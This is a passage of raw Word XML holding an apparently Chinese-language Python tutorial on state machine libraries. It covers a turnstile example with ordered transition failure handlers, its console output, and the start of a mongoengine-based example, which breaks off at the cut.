    <w:p w14:paraId="1AF31F23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    locked = State('locked', initial=True)      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>定义两个状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE3F74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    unlocked = State('unlocked')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D538C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:bookmarkStart w:id="417" w:name="OLE_LINK14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>@event(from_states=(locked, unlocked), to_state=unlocked)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="417"/>
    <w:p w14:paraId="05EF2872" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def coin(self):                                                     # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>解锁的处理函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF5935" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        assert random.random() &gt; .5, 'failing for demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E1E24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">               purposes, only ..'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31174DC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('*blingbling* .. unlocked!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660EB68F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    @event(from_states=(locked, unlocked), to_state=locked)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7E76CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def push(self):                                                     # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>锁定处理函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A04AB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('*push* .. locked!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E7FA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    @transition_failure_handler(calling_sequence=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33542693" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def turnstile_malfunction(self, method, from_state, to_state,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58A760" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">            error):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A19DCC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(" *** turnstile_malfunction() is Running")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D377C08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    @transition_failure_handler(calling_sequence=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E3285" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def before_turnstile_malfunction(self, method, from_state, to_state,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404FCA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">            error):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D2819" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(" *** before_turnstile_malfunction() is Running")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D81EF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2912C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">turnstile = Turnstile()                                         # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建状态机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC1E103" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">for _ in range(10):                                                     # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE21AF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    handler = random.choice([turnstile.coin, turnstile.push])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633043ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    handler()                                                           # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAB3AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("=======================").           # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分隔符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB4F0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D4C52C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行后的输出如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619CF0D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ python statemachine.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0495C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*blingbling* .. unlocked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B45C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0F110" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*push* .. locked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC9966" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855CCCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** before_turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E99C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E682C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F23A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** before_turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB74B9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>*** turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC4B0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B383871" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** before_turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA3784" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90B584" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36907EBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** before_turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605B072E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*** turnstile_malfunction() is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F467B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF9D32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*push* .. locked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E7011" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178DFB0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*push* .. locked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE497AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BE161" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*push* .. locked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2200AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56810720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*push* .. locked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB3077" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757F16E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现，错误处理函数是按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> calling_sequence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性所指定的顺序执行的。每次在执行状态转换函数的过程中，如果抛出了异常，那么被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> transition_failure_handler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰的函数都会被调用，我们可以从参数中得知错误的详细情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E754F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05072601" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个例子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E49A0B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A7A110" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def test_before_callback_blocking_transition():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDAC425" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>@acts_as_state_machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A39769" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    class Runner(mongoengine.Document):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4540F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        name = mongoengine.StringField(default='Billy')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49B724" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A03A4F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        sleeping = State(initial=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB6241" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        running = State()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53553400" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        cleaning = State()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8BC6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7821153B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        run = Event(from_states=sleeping, to_state=running)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283879C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        cleanup = Event(from_states=running, to_state=cleaning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A3F519" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        sleep = Event(from_states=(running, cleaning), to_state=sleeping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE8FF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE5759B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        @before('run')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD9FB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
